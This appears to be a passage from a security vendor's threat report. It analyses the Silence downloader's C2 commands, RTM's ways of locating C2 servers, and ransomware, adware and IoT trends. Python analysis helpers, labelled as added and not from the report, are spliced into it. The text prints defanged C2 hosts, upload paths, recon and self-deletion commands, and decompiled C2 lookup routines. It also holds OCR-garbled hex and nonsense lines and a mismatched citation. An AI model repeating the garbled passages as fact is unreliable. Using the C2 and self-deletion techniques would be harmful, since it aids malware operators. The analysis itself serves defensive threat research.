        ... *_handler_obj;                // esi
        ... handler_obj;                  // al

        cc_data = &this->cc_data;
        handler_data = &this->handler_data;
        _handler_obj = ...sub_402E72(cc_data);
        CommandHandler_sub_402C31(handler_data, ...);
        if ( _handler_obj )
            (**_handler_obj)(_handler_obj, 1);
        Sleep_sub_401BD1(...);
        handler_obj = CheckBreak_sub_402A11(handler_data);
        ...

Communication between the downloader and
the C2 server goes as follows:


- the downloader sends a request to hxxp(s)://minkolado[.]top/[...]
  and receives an ID number assigned to the infected system;
- all subsequent requests are made to
  hxxp(s)://minkolado[.]top/{num};
- the C2 server responds with a command
  for the downloader.


Commands from the C2 server are processed
in the CommandHandler function.


CommandHandler function pseudocode (partially
recovered; unreadable fragments are marked with ...)


    code_1 = GetCode_sub_4028E8(handler_obj);
    if ( !code_1 )                         // if command_code == ...
        NewIdentityCommand_sub_402989(handler_data, handler_obj);   // new_identity_command
    code_2 = code_1 - 1;
    if ( !code_2 )                         // if command_code == ...
        ;                                  // nop_command
    code_3 = code_2 - 1;
    if ( !code_3 )                         // if command_code == 3
        DownloadAndExecuteCommand_sub_402AEE(handler_data, handler_obj);   // download_and_execute_command
    code_4 = code_3 - 1;
    if ( !code_4 )                         // if command_code == ...
        DestroyCommand_sub_402A18(handler_data, handler_obj);   // set_destroy_command
    ...                                    // pc_info_command
        PCInfo_sub_402CB0(handler_data, handler_obj);
    ...                                    // undefined_command

Commands from 
the C2 server 


The loader supports the following commands:


- new_identity_command
- nop_command
- download_and_execute_command
- set_destroy_command
- pc_info_command


The names of the commands correspond to
the names of the C++ classes inherited from
the [...] class. The [...] class contains a
4-byte field for the command identifier from the
control server (in the pseudocode above it is
identified as command_code).


A detailed description of each command is
given below.


new_identity_command. This command
is executed if a string that converts to an
integer value was received from the C2
server. When the downloader receives
this command, it changes the system's ID
number, which changes the relative URL
for communication with the C2 server. For
example, if the server sends the '1337' string, the
URL for C2 communication in the case of this
particular system will change to hxxp(s)://
minkolado[.]top/1337.
nop_command. This command is executed
if the string 'jest' is received from the control
server (jest means 'is' in Polish). When the
downloader receives this command, it does
nothing.


download_and_execute_command. This command
is executed if the string 'nasz' ('ours' in Polish)
is received from the C2 server. The
string is sent along with the relative URL for
downloading additional malware.


When the command is received, the
downloader performs the following actions:


- downloads data from the received address;
- checks the header of the downloaded data:
  the first 4 bytes should be the header of a
  CAB file (MSCF);
- if the downloaded data has the correct header,
  the downloader saves it as
  [...]\AppData\Local\temp.cab;
- extracts the file from the
  archive using the standard
  Windows utility 'expand'.


If the file is successfully
extracted, it is launched from the same
directory.


set_destroy_command. This command
is executed if the string 'praktycznie'
('practically' in Polish) is received from the C2
server. When this command is received, the
downloader deletes itself using the following
CMD command: [...] nul & del {self_file_name}


pc_info_command. This command is
executed if the string 'poligraficznym'
('polygraphic' in Polish) is received from the C2
server. When this command is received, the
downloader collects and sends information
about the infected system to the C2 server. The
process is as follows:


- the downloader sends the output of the
  tasklist, ipconfig, hostname, netstat -na, whoami
  and systeminfo commands to
  %UserProfile%\AppData\Local\[...].txt;
- the downloader packs [...] into [...]
  using the standard Windows utility
  'makecab';
- before the next request for a command
  from the C2 server (every 3 seconds),
  [...] will be uploaded to the C2
  server as introduce.dat (hxxp(s)://
  minkolado[.]top/{num}/introduce.dat).


undefined_command. The downloader code
includes one more class for handling a server
command: undefined_command. It is used if
the downloader receives incorrect data from the
C2. The attackers named this class with a typo,
undefined_commanad.
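To make the command protocol above concrete, here is an added example (not code from the report and not the downloader's own code) that labels captured C2 responses with the command class they would select and replays them into a timeline; the whitespace separator between 'nasz' and its relative URL, the initial ID and the sample responses are assumptions.

```python
"""Added example (not code from the report): label C2 responses with the
command class the Silence downloader would dispatch them to, as described
above, so that responses captured in a sandbox can be turned into a timeline.
Nothing is downloaded or executed; the download case only validates the CAB
header.  Assumptions (hypothetical): the command keyword and the relative URL
of 'nasz' are separated by whitespace, and the sample responses below are
constructed.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

C2_BASE = "hxxp(s)://minkolado[.]top"   # C2 domain from the report, defanged

# Keywords quoted in the report and the command classes they select.
KEYWORDS = {
    "jest": "nop_command",
    "nasz": "download_and_execute_command",
    "praktycznie": "set_destroy_command",
    "poligraficznym": "pc_info_command",
}


@dataclass
class Command:
    name: str
    argument: Optional[str] = None  # new id, or the relative URL for 'nasz'


def classify(response: str) -> Command:
    """Map one raw C2 response to the command class it selects."""
    text = response.strip()
    # A string that converts to an integer changes the system ID.
    if text.isdigit():
        return Command("new_identity_command", text)
    parts = text.split(None, 1)
    if not parts:
        return Command("undefined_command")
    keyword = parts[0]
    rest = parts[1].strip() if len(parts) > 1 else ""
    if keyword == "nasz":
        # The relative URL of the additional payload travels with the keyword.
        return Command(KEYWORDS[keyword], rest or None)
    if keyword in KEYWORDS and not rest:
        return Command(KEYWORDS[keyword])
    # Anything else lands in the class the authors misspelt undefined_commanad.
    return Command("undefined_command")


def c2_url(system_id: str) -> str:
    """URL used for every request after the ID was assigned."""
    return f"{C2_BASE}/{system_id}"


def pc_info_upload_url(system_id: str) -> str:
    """Where the CAB built by pc_info_command is uploaded."""
    return f"{c2_url(system_id)}/introduce.dat"


def is_cab(data: bytes) -> bool:
    """download_and_execute_command only accepts data starting with MSCF."""
    return data[:4] == b"MSCF"


def simulate(responses: List[str],
             system_id: str) -> List[Tuple[str, str, Optional[str]]]:
    """Replay captured responses and return (url, command, argument) rows.
    Mirrors the loop: a new id rewrites the URL for later requests, and
    set_destroy_command ends the session because the sample deletes itself."""
    rows = []
    for response in responses:
        cmd = classify(response)
        if cmd.name == "new_identity_command":
            system_id = cmd.argument
        rows.append((c2_url(system_id), cmd.name, cmd.argument))
        if cmd.name == "set_destroy_command":
            break
    return rows


# Constructed sample session; the ID assigned by the first request is '42'.
SAMPLE_RESPONSES = ["1337", "jest", "nasz /u/payload.cab", "poligraficznym",
                    "garbage", "praktycznie", "jest"]

if __name__ == "__main__":
    for row in simulate(SAMPLE_RESPONSES, "42"):
        print(row)
```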
Attribution of the
new downloader


The downloader we analysed combines the
features of the Silence main module and the
previous downloader, known as TrueBot.


Namely, the following attributes are similar to the
main module:


- the practice of assigning identifiers to
  infected users;
- the method of obtaining imported functions
  and decrypted strings.


The comparison of the new loader with TrueBot
is shown below.


Feature | TrueBot | The new Silence downloader
Collecting information about the infected system with the use of Windows system utilities | tasklist, ipconfig, hostname, qwinsta, and others | tasklist, ipconfig, hostname, netstat -na, whoami, systeminfo
Uploading of additional malware | In the form of encrypted data | In the form of a CAB archive
Self-deletion | Available | Available
Additional commands from the C2 server | DEL | Integer value, jest, nasz, praktycznie, poligraficznym
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governments. 


Now organisations are threatened even 
by the types of malware that traditionally 
targeted users, for example adware which 
displays advertising intrusively. 


Over the past year and a half, however, 
and healthcare. Today, malware of this
kind, which encrypts files on a victim's
computer and then demands a ransom for
the decryption key, participates in targeted
attacks with complex tactics and deep
penetration into the victim's network.
Hence, ransomware is a major topic of this
chapter.
when the world was swept up by the epidemic
of attacks involving the WannaCry and
NotPetya families. These massive infections
paralysed thousands of organisations around

of mass attacks involving ransomware has
declined.¹ Today, attackers using encrypting
malware are much more selective: their attacks
are directed at specific organisations, from
which they expect to receive a substantially
bigger ransom.
Over the last 18 months, ransomware attacks
have become more destructive. Attackers
began to meddle not only in the IT
processes of the target companies, but also
in the operation of their physical facilities (for
example, various types of machinery). This
is critical for those victims of ransomware
whose activities depend on the hardware
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Another important trend: attackers began to 
access to the victim's network, attackers
are not in a hurry to launch the ransomware.
Instead, they focus on exploring the
infrastructure, looking for its vulnerabilities,
and establishing as many persistence mechanisms
as possible. Only when they get to
the key systems in the network do the criminals
launch their ransomware. As a result, the attack
hits the organisation harder, which gives the
attackers a chance to leverage a higher ransom
for decrypting the files.³


The more advanced the attacks get, the more
money they demand. According to one
estimate, the average ransom amount in
2019 reached $5.9 thousand, a 37% increase
versus the average in 2018.⁴


3. Ransomware against the machine: how adversaries are 
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and OT // FireEye. 


4. […]



Mass WannaCry and NotPetya ransomware attacks occurred in spring 2017. Since then, many of the vulnerabilities exploited by ransomware have been patched by the developers, and protection measures against old threats have been worked out.
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the cost of being sloppy with the basic rules 
of cybersecurity. 


Three years later, this malware family reminds
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This story began in March 2017. That was when Microsoft released an update that patched a serious vulnerability in the implementation of one of the network protocols. The […] the US National Security Agency, where a tool exploiting this vulnerability had been known as EternalBlue. Microsoft classified the patch as […] versions of Windows.

[…] of computers in 70 countries were hit by WannaCry malware, which used none other


than EternalBlue to spread across the network 
of targeted organisations. 


Before the threat could be stopped, the number of infected systems reached 200 thousand, and the geography of the attack expanded to […] corporations and governmental agencies, including the UK National Health Service.
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After such a massive attack, one would expect almost all computers to get protection against EternalBlue, which was as simple as updating
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to spread WannaCry via already infected computers were detected. This means that the number of […] EternalBlue is quite alarming. In other words, Windows OS has not been updated on such computers since at least March 2017.

Given the circumstances, it is by sheer luck that no second WannaCry epidemic has occurred yet. The versions of the malware currently circulating on the Internet are mostly modified so that they infect devices without encrypting files.

So far, the unlearned lesson has not cost as much as it did three years ago. But this does not always happen, as the example of another old acquaintance, the Ryuk ransomware, shows.
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Ryuk: a hybrid […]


From the very beginning, the operators of Ryuk, […] 2018, made targeted attacks on corporate networks and demanded large amounts from their victims. For the first five months of the malware's existence, its creators earned in total more than $3.7 million. Ryuk was also used in a ransomware attack with the largest […] million.⁹


What is so special about Ryuk is that it clearly illustrates the cybercriminals' tendency to collaborate. This ransomware is distributed with the use of Emotet and Trickbot, the former banking trojans that expanded their functionality in the second half of the past decade to deliver other malware (we discussed this in more detail in Threat Zone 2019).


[…] vector was the infection of the corporate network of Epiq Global, a big law firm. The infection paralysed the operations of all 80 of its offices around the world.

The cause of the incident, according to anonymous sources in the media: many computers in Epiq ran older versions of Windows.¹⁰ ¹¹


8. Big game hunting with Ryuk: another lucrative targeted 
ransomware // CrowdStrike. 


9. 2020 global threat report // CrowdStrike. 
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activity on systems // LawSites. 
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attack // TechCrunch. 
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New threats: […]


In 2019, several new families of ransomware emerged. We are going to focus on the two that demonstrate new approaches used by the developers and operators of ransomware.


LockerGoga: in-depth attacks


LockerGoga malware attracted attention at the end of January 2019 with its debut attack on the French company Altran Technologies, a […] firm. The company did not disclose any details of the incident, only saying that the attackers had used […].¹³


The incident with the Norwegian company Norsk Hydro, one of the largest aluminium producers in the world, shed light on the specific tactics used by LockerGoga operators.¹⁴ ¹⁵

The victim company disclosed the details of the attack (they even gave a description of the attackers' actions), so we have a chance to evaluate, from an outside perspective, how ransomware attacks have become more and more targeted.


13. Update on the cyber attack // Altran. 
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attack // Reuters. 
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double attack on Hydro] // NRK Norge. 
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The attackers had infiltrated the Norsk Hydro 
network a few months before the ransomware 
was launched. The method of infiltration was 
a phishing email: the malware was attached 
to the email sent on behalf of an actual Norsk 
Hydro client and signed with a valid certificate. 


Having gained access to the network, the hackers compromised Active Directory, a Windows OS service responsible for user authorisation and access control for network resources.¹⁶

This gave the attackers full access to the company's infrastructure. Only then did they distribute the ransomware throughout the organisation and run it.¹⁷
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17. Ransomware costs double in Q4 as Ryuk, Sodinokibi proliferate // Coveware.
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The ransomware paralysed systems that supported business process and production chain management. As a result, most of the facilities owned by Norsk Hydro were forced to switch to manual operation mode. Several aluminium processing factories even suspended operations entirely.¹⁸ ¹⁹


Apart from […], attacks involving LockerGoga are distinguished by their use of social engineering tactics.

Typically, ransomware generates a text message with a bitcoin address and the required amount of ransom.

LockerGoga provides only the contact details of the attackers and encourages the victim to discuss the conditions for decrypting files by email. The attackers' message says that the ransom amount depends on how promptly the victim contacts them.²⁰


18. Ransomware against the machine: how adversaries are 
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and OT // FireEye. 

19. Cyber-attack on Hydro // Hydro. 


20. New LockerGoga ransomware allegedly used in Altran 
attack // Bleeping Computer. 
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Creators of Sodinokibi, which was discovered 
in April 2019, were the first ransomware 
developers to set up monetisation with the use 
of RaaS model (Ransomware as a Service). 


[…] attackers. In particular, Sodinokibi is distributed in exchange for a share of the earnings generated from successful cyberattacks.

For the first eight months of the ransomware's existence, its developers engaged 39 such
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The RaaS model could be a massive threat. This is clearly demonstrated by the number of attacks accomplished with the use of Sodinokibi: in the fourth quarter of 2019 the malware was involved in every third incident associated with ransomware (29%).²²


The malware developers themselves engage in attacks as well. Such attacks are truly surprising in the method chosen for the actual […].


Last December, the Sodinokibi developers 
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the Internet if it failed to pay the ransom.’ 
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The attackers launched a special website where 
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Artech Information Systems, one of the largest […] industry.²⁴


In May 2020, Sodinokibi hackers accessed 
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with some of the world’s best-known celebrities. 


[…] in exchange for the stolen files. This amount was doubled after the firm refused to pay. At the time of this writing, the hackers had released a batch of documents related to the singer
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NW/FeTe lo) alate kswe (cl > Peas 


22. Ransomware costs double in Q4 as Ryuk, Sodinokibi 
proliferate // Coveware. 


23. […] // Bleeping Computer.

24. Sodinokibi ransomware publishes stolen data for the first time // Bleeping Computer.


25. Buhtrap group uses zero-day in latest espionage campaigns 
// WeLiveSecurity by ESET. 
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more diverse digital threats than a year before. In this section, we will cover new factors you have to consider while developing security policies, as well as shine light on those known attacks whose risk has significantly increased.
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Adware, riskware, 
hacktool: from users 
to business 


Last year we reported on a shift in attacks from targeting particular users to targeting organisations, […] companies. This trend has indeed got worse.


[…] or advertising malware.

This class includes malware which displays unwanted advertisements. Commonly, it is done by changing the home page or default search engine in a web browser.

Advertising modules traditionally target individuals, but last year they began appearing frequently in corporate networks. In 2019, the number of attacks on organisations with the use of adware increased more than fivefold (+463%).


The second example of a significant increase is seen in attacks using so-called riskware.


This class of threats includes legitimate software which, in the hands of an attacker, can harm the target system. A typical example of riskware is any software for remote control (like TeamViewer or UltraVNC). In your company, such programmes can be used, for example, by system administrators to configure workstations, but if attackers manage to install such a programme, or if they get access to it on a compromised system, they will be able to fully control the infected machine.


The number of attacks using riskware against organisations increased by 52% in 2019 versus 2018. The number of such attacks on individuals decreased by 35%.


Finally, it is worth mentioning here the surge of attacks which use tools for penetration testing, a cyberattack simulation done by a legitimate actor to find vulnerabilities.

Such software is designed to emulate the actions of an attacker. Among these tools are password cracking tools, malware obfuscators, exploits for known vulnerabilities, etc.

Last year, cybercriminals used such software to attack organisations at three times the 2018 rate (+224%).²⁶


26. 2020 state of malware report // Malwarebytes. 


A single successful attack on a particular organisation is more fruitful than successful attacks on tens of thousands of users. Stolen data enables the cybercriminals to earn more money, and compromised resources help gain more computing capacity. According to the statistics available on adware and riskware, it seems that more and more malware developers and operators are beginning to […].
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[…]
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one of the most problematic in terms of cybersecurity.
©; 
Any potential vulnerabilities of routers, surveillance cameras, smart kettles, light bulbs, robotic vacuum cleaners and other household appliances in mass production are always the last to get any consideration, if any at all.

This is helpful for attackers, who have long been exploiting vulnerable IoT devices when creating botnets, which are made up of devices controlled by the attackers. Botnets made of IoT devices are engaged in DDoS attacks on corporate networks.


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The situation is aggravated by the significant size and growth rate of the Internet of Things. Reality has outpaced the predictions of experts: analysts believed that by the end of 2019 there would be 8.3 billion IoT devices connected to the network; the number ended up being […] will most likely exceed the latest predictions for 2021, which were made two years ago. Back then, experts estimated this figure at 11.6 billion.²⁷


The increase in the IoT market is directly proportional to the scale of the threat posed by IoT botnets.

For the first six months of 2019, the number of attacks on honeypot servers reached […] in the second half of 2018.

Most likely, such a figure would have been impossible without the contribution of IoT devices. Several facts point to this.


Firstly, almost half of the malicious connections (1.4 billion) were recorded on the ports used by Telnet and SSDP. The former is now relevant mainly for IoT devices. The latter is often used for DDoS attacks using IoT botnets.

Secondly, most of the attacks on honeypot servers involved malware from the Mirai family, one of the main IoT malware families, which accounts for 16–21% of IoT-related incidents.²⁸

Finally, for the same first six months of 2019, there was a report on an abnormal increase (55%) in compromised IoT devices.²⁹





27. IoT 2019 in review: the 10 most relevant IoT developments of the year // IoT Analytics.

28. Attack landscape H1 2019 // F-Secure.

29. SonicWall 2019 report: 55% rise in IoT malware attacks // Open Access Government.
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DoS (Denial of Service) is an attack in which the target server or service is overloaded with requests to such an extent that it becomes inaccessible to the user.

DDoS (Distributed Denial of Service) is a type of DoS attack initiated using a huge number of devices with different IP addresses.

Honeypot servers are systems that are intentionally made vulnerable to lure the attackers and collect data about their tools and methods.
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attacks were recorded on honeypot servers


[…]


In addition to the above, banking trojans remain a significant threat to companies in the Russian cyberspace. Disguised as legitimate files, trojans breach a target system and allow cybercriminals to gain access to victims' bank accounts.


A typical attack with this class of malware goes as follows.

An employee of a company receives an email with a Microsoft Word document attached, which allegedly contains a contract, urgent invoice, commercial offer or a notification from a government body.

In fact, the file contains macros (software algorithms) written by the attackers. Microsoft Office macros help automate routine tasks, but cybercriminals use them to initiate actions that launch malware.

The malware connects to the command-and-control (C2) server and starts receiving additional functional modules and commands from the attackers.

The attackers proceed to steal money using the compromised machine. This is usually done by manipulating 1C:Accounting programmes, which are quite common in Russian companies. The malware replaces a legitimate recipient's details in payment orders with those used by the adversary.




Since 2014, such attacks have mostly been carried out using three programmes: Buhtrap, RTM and Dimnie. The activity of Dimnie decreased in 2019 and 2020, but the other two stay relevant.

Buhtrap has started being utilised as spyware. In that role, it has been used in attacks against government organisations. This was observed […]. In the same campaign, the malware exploited a zero-day vulnerability, which is also not so typical of a banking trojan.³⁰





30. SonicWall 2019 report: 55% rise in IoT malware attacks // Open Access Government.
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RTM, an ironic acronym for Read the Manual, continues to target companies. The malware's activity has been growing: in Q1 2020, we found twice (+108%) as many unique executable RTM files as in the same period last year. Usually, the difference between these executable files is insignificant, but some samples showcase a new phase of RTM evolution.

One of the key directions for the trojan's development is associated with connections to C2 servers. To achieve their objectives, it is important for attackers to maintain a stable connection with the infected computers. Therefore, they hide the addresses of the servers and regularly change the ways in which the malware finds these addresses.

Some of the new approaches can be surprisingly inventive. In the next section, we will look at some of them and see how they have changed in different versions of RTM.
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RTM: search for C2 servers


RTM prefers to transmit the C2 server address so that the IP could be dynamically changed without modifying the malware's source code.


On the one hand, this makes things easier for 
attackers and can throw analysts off their trail. 
On the other hand, it allows experts to predict 
the addresses of command-and-control 
servers before another campaign. 


Since the trojan appeared, we have observed 
four ways it receives IP addresses of the C2 
servers. 


2015–2016: RSS

The first versions of RTM used an RSS feed to update the addresses of the command-and-control servers.

Attackers would create LiveJournal blogs containing encrypted C2 addresses. To get the C2 addresses, RTM would send a request to hxxps://<blog_name>.livejournal[.]com/data/rss and process the response.

An example below is the response from hxxps://f72bba81c921.livejournal[.]com/data/rss.

RSS feed content. The description field contains encrypted addresses of the command-and-control servers:


<rss version='2.0'>
<channel>
<title>f72bba81c921</title>
<link>https://f72bba81c921.livejournal.com/</link>
<description>f72bba81c921 - LiveJournal.com</description>
<lastBuildDate>Thu, 05 Nov 2015 02:32:20 GMT</lastBuildDate>
<generator>LiveJournal / LiveJournal.com</generator>
<lj:journal>f72bba81c921</lj:journal>
<lj:journalid>77015555</lj:journalid>
<lj:journaltype>personal</lj:journaltype>
<item>
<guid isPermaLink='true'>https://f72bba81c921.livejournal.com/627.html</guid>
<pubDate>Thu, 05 Nov 2015 02:32:20 GMT</pubDate>
<title>1</title>
<author>f72bba81c921</author>
<link>https://f72bba81c921.livejournal.com/627.html</link>
<description>


[40 ]1b05e4a4d3709f 1eaaGaddba2b981868c8ad 
5b3c6a0a7/1090eed48982ab4727035f4b0b23 F44 
69e11ed1109f5b1124985a6e9ee8e662dFf21c6d5 
93a9a960[/40]<br /> 


<br />[41]9e7780b8c0a641edb710d52dfOb80b 
9997a74b3c5fdab8cd5da6775a9 Ff b9bFf 13883711 
F16427c0474793c152798e4280a620594a03ccOfc 
15d796b2584585[ /41]<br /> 


<br />[30]8278fcdcb4694799680f251 faf0658 
smcTats] 4l0[oneKorel oX=Xel-Joletehelolololeetole si me WAole(-ts12) olor Tem As) 
e771cfae94fbb6a8ce0ea3becd2e9087e5al 8353 
LV -\°F-¥- WA owas] o¥-1:10) WAL /> 


<br />[1]9efc@8e5bd3e58df11b6dc74a5021 8d 
0374494c32b15445093d11c82e1960f12ae68462 
19aaf3afOdabdd8b6b5a6df37748c47b9c268a0T 
ol ldo) ee 


<br />[60]2b026e46792db1bb6f90e4ec774c13 
659c057b13181122328f340db23a2978e5777d3a 
92773a86ce5f347b909e95a79F4b562da7a9450a 
34029f[/60]<br /> 


<br />[42]bff@b4cf5a9da230b5db8650ae371a 
297fd10b06f09494533dad576eb1e60047af1230 
(eM smeKelerodclelel-\-a-WAstou mi Motolo 2-0-6 ke lok-\on mm im Ae (-M Ron me) 
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a3d@d8efbeeG@94[/42]<br /> 


<br />[43]7f54460724363cd9ba7efb9b4340Ff3 
€122107839d73c0023ef 508afe2232b0e991a294 
d2894eb4dd3c986c2f52984337f84aa7fcae3d3a 
edd0@0a58792b82[/43]<br /> 


<br />[56]cd@c24857167077f652a2a654e323¢c 
ef5d212de3c7fe0fb806b58c02a87eb3 7c0ab68eFf 
f6aa7af0276e55e040efC67C72852cb99059a7d0 
0e380587a6561c[/56]<br /> 


<br />[57]456ceb4f3b31c84aa3 f06b41c44d60 
d37d855250a840114843cbd9dd6f 8e34e82e3ad9 
C242405560a411636afabf043ce877351157b/ad 
9fb46298e04fde[/57]<br /> 


<br />[58]54a007ec6ab22c8d3a4608aGabd7bf 
700652c483b16152e33d11051362e28ddb07cc3a 
47ae718b61f93198b59969b7467F9945e55ce1bd 


e2e0cee4fc4a626[/58]<br /> 


<br />[59]c82e1e269ae245ca14545d22b4c693 
Aebf f53888df8d93bf54dc5de0e369ddae03c78a 
c1e804960d2942fe9e41104aa852a55cfCc88354e3 
4987f98ca6b019[ /59] 


</description>
<comments>https://f72bba81c921.livejournal.com/627.html#comments</comments>
<lj:security>public</lj:security>
<lj:reply-count>0</lj:reply-count>
</item>
</channel>
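As an added example (not code from the report or from RTM), the following Python pulls the [N]…[/N] hex payloads out of the description field of a feed in the format shown above, which is the first step an analyst needs before the encrypted addresses can be examined; the feed below is constructed with filler bytes in place of the real blobs, and because the page does not show how the blobs are decrypted, the example stops at extraction.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed feed in the shape of the LiveJournal RSS above: the payloads are
# filler bytes, not the real encrypted C2 addresses. LiveJournal delivers the
# <br /> separators HTML-escaped inside the description element, and the hex
# runs may be wrapped across lines by the transport or the viewer.
SAMPLE_RSS = """<rss version="2.0"><channel>
<title>example</title>
<description>example - LiveJournal.com</description>
<item>
<title>1</title>
<description>[40]0a1b2c3d4e5f[/40]&lt;br /&gt;
&lt;br /&gt;[41]deadbeef
00ff[/41]&lt;br /&gt;
&lt;br /&gt;[30]not-hex-at-all[/30]&lt;br /&gt;
&lt;br /&gt;[1]cafe[/1]</description>
</item>
</channel></rss>"""

# [<id>]<body>[/<id>] with matching opening and closing ids; DOTALL because the
# hex may be wrapped across lines.
TAG_RE = re.compile(r"\[(\d+)\](.*?)\[/\1\]", re.S)


def extract_tagged_payloads(rss_xml: str) -> Dict[int, bytes]:
    """Return {tag_id: raw_bytes} for every well-formed [N]hex[/N] block found
    in any <description> of the feed. Blocks whose body is not valid hex are
    skipped, so one garbled entry does not stop the rest from being collected."""
    root = ET.fromstring(rss_xml)
    payloads: Dict[int, bytes] = {}
    for desc in root.iter("description"):
        text = (desc.text or "").replace("<br />", "")
        for match in TAG_RE.finditer(text):
            tag_id = int(match.group(1))
            hex_body = re.sub(r"\s+", "", match.group(2))
            try:
                payloads[tag_id] = bytes.fromhex(hex_body)
            except ValueError:
                continue
    return payloads


def tag_ids(rss_xml: str) -> List[int]:
    """Sorted list of the tag ids present: a cheap fingerprint of a feed, since
    the set of ids is a property of the sample family rather than of the blog."""
    return sorted(extract_tagged_payloads(rss_xml))
```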


The decrypted strings with the default C2 address and the RSS feed address. The data was obtained during the malware's execution:

    offset aGet              ; "GET"
    offset aPost             ; "POST"
    offset aHttp11           ; "HTTP/1.1"
    offset aMozilla50Compa   ; "Mozilla/5.0 (compatible; MSIE 9.0; Wind"...
    offset aAcceptTextHtml_0 ; "Accept: text/html, application/xhtml+xm"...
    offset aAcceptTextHtml   ; "Accept: text/html, application/xhtml+xm"...
    offset aWebstatisticao   ; "webstatisticaonline.tech/r/z.php"
    offset […]               ; "[…]f72bba81c921.livejournal.com/dat"...
    offset […]               ; "[…]"
    offset […]               ; "[…]"
    offset aDtt              ; ".dtt"
    offset […]               ; "[…]"
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2016-2019: 


In March 2016, RTM started using .bit domains for the C2 servers' addresses.

These domains are supported by Namecoin, an alternative DNS registrar based on blockchain technology. The system is decentralised, which makes the domains difficult to block.

IP addresses of the C2 servers on .bit domains were received by RTM in one of two ways:

* via the Namecoin block explorer's API;
* through domain name resolution using special DNS servers.


Function for getting C2 addresses via .bit domains:

    ascii_cc_ptr = 0;
    v3 = a3;
    ip_address = ip_res;
    wide_cc_ptr = cc_address_prt;
    v9 = &savedregs;
    v8 = &loc_41210F;
    v7 = __readfsdword(0);
    __writefsdword(0, &v7);
    res = GetIPAddress_NamecoinAPI_sub_411BF0(cc_address_prt, ip_res, a3);
    if ( !res )
    {
      LStrFromWStr(&ascii_cc_ptr, wide_cc_ptr);
      if ( !GetDnsImports_sub_41201C(res)
        || (res = GetIPAddress_DnsResolve_sub_411E4C(ascii_cc_ptr, ip_address, v3), !res) )
      {
        res = gethostbyname_sub_411D90(ascii_cc_ptr, ip_address);
      }
    }


Method 1: via the Namecoin block explorer's API. In this case, RTM sends a request to hxxps://namecoin.cyphrs[.]com/api/name_show/d/<domain_name> and extracts the IP address of the C2 server from the body of the response page.
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Notably, RTM gets two IP addresses at once: 
if one is unavailable, the malware contacts 
the second one without repeating the entire 
request procedure. 


Let us look at how the function for receiving C2 addresses works with the stat-counter-7.bit domain.

Function for receiving IP addresses of the C2 servers via the Namecoin block explorer's API:


    url = 0;
    name_ptr = 0;
    data = 0;
    v18 = a3;
    v3 = a2;
    cc_address_ptr = cc_ptr;
    v12 = &savedregs;
    v11 = &loc_411D7E;
    v10 = __readfsdword(0);
    __writefsdword(0, &v10);
    LStrClr(a2);
    LStrClr(v18);
    GetName_sub_411BA0(cc_address_ptr, &name_ptr);   // stat-counter-7.bit
    […](&url, […]->api_name_show_d, name_ptr);
    // name_ptr value: /api/name_show/d/
    // url value: namecoin.cyphrs.com/api/name_show/d/stat-counter-7
    v5 = HttpRequest_sub_40DC88(ofDecryptedWideStrings->namecoin_cyphrs_com, url, 0,
                                0, 443, 2, 0, 8, &data_struct) != 0;
    if ( v5 )
    {
      LStrFromPCharLen(&data, v17, data_struct);
      index = LStrPos(ascii->aIp, data);          // ip\"
      if ( index )
      {
        GetStr_sub_4035E8(&data, 1, (index + 7));
        v7 = LStrPos(ascii->slash, data);         // \"
        if ( v7 )
        {
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LStrCopy(v3);
          GetStr_sub_4035E8(&data, 1, (v7 + 1));
          v5 = sub_40E2C4(*v3, 0);
          v8 = LStrPos(ascii->_slash, data);      // ,\"
          if ( v8 )
          {
            GetStr_sub_4035E8(&data, 1, (v8 + 2));
            if ( LStrPos(ascii->slash, data) )
            {
              LStrCopy(v18);
            }
          }
        }
      }
    }





As part of this method, attackers used requests not only to the namecoin.cyphrs[.]com API, but also to […]; in that case, RTM processed the 'Current value' field.
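As an added example (not the report's or RTM's own code), this Python reproduces the string-search steps of the decompiled function above on a constructed name_show response, so that an analyst can pull both C2 addresses out of a captured response exactly the way the malware does, and then filter them before they go into a blocklist; the response body, the name and the addresses in it are made up, and the builder is only a stand-in for the explorer's real output.

```python
import ipaddress
import json
from typing import List, Optional, Tuple


def build_namecoin_response(ips: List[str], name: str = "d/example-name") -> str:
    """Constructed stand-in for a name_show response (assumed layout, not the
    explorer's full format). The registered value is a JSON document embedded
    as a string, so its quotes arrive escaped as \\" in the outer document.
    Compact separators matter: the decompiled code skips a fixed 7 characters
    after 'ip"', which only lines up with the {"ip":["..."]} layout."""
    value = json.dumps({"ip": list(ips)}, separators=(",", ":"))
    return json.dumps({"name": name, "value": value})


SAMPLE_RESPONSE = build_namecoin_response(["192.0.2.10", "198.51.100.7"])


def extract_c2_ips(body: str) -> Optional[Tuple[str, str]]:
    """Mirror the decompiled logic with Delphi's 1-based offsets converted to
    0-based: find ip\\" and skip index+7 characters, cut the first value at the
    next \\", skip past ,\\" and cut the second value at the following \\".
    Returns None wherever the malware's own flow would also fail to produce
    two addresses."""
    idx = body.find('ip\\"')                   # LStrPos(ascii->aIp, data)
    if idx < 0:
        return None
    rest = body[idx + 8:]                      # GetStr(&data, 1, index + 7)
    end1 = rest.find('\\"')                    # LStrPos(ascii->slash, data)
    if end1 < 0:
        return None
    first = rest[:end1]                        # LStrCopy(v3)
    rest = rest[end1 + 2:]                     # GetStr(&data, 1, v7 + 1)
    sep = rest.find(',\\"')                    # LStrPos(ascii->_slash, data)
    if sep < 0:
        return None
    rest = rest[sep + 3:]                      # GetStr(&data, 1, v8 + 2)
    end2 = rest.find('\\"')
    if end2 < 0:
        return None
    second = rest[:end2]                       # LStrCopy(v18)
    return first, second


def extract_valid_c2_ips(body: str) -> List[str]:
    """Same extraction, keeping only syntactically valid IPv4 addresses: a
    defender feeding captured responses into a blocklist wants this filter,
    since the field is attacker-controlled text."""
    pair = extract_c2_ips(body)
    if pair is None:
        return []
    valid: List[str] = []
    for candidate in pair:
        try:
            valid.append(str(ipaddress.IPv4Address(candidate)))
        except ipaddress.AddressValueError:
            pass
    return valid
```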





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Method 2: via domain name resolution.

Attackers used this method if they failed to get a C2 address using the Namecoin block explorer's API. In that case, RTM used special DNS servers to receive an IP address that corresponded to the domain name of the C2 server. This was done by the DnsQuery_A function in the malware's core.dll.

Function that resolves the C2 domain name via the special DNS servers (decompiled fragments; passages garbled in the source are marked […]):

    ascii_cc_ptr = a1;
    ip_addr = ip_address;
    pr_index = 0;
    if ( DnsQuery_A )
    {
      ip_str = LStrToPChar(ascii->dns_ip_1);     // 188.165.200.156
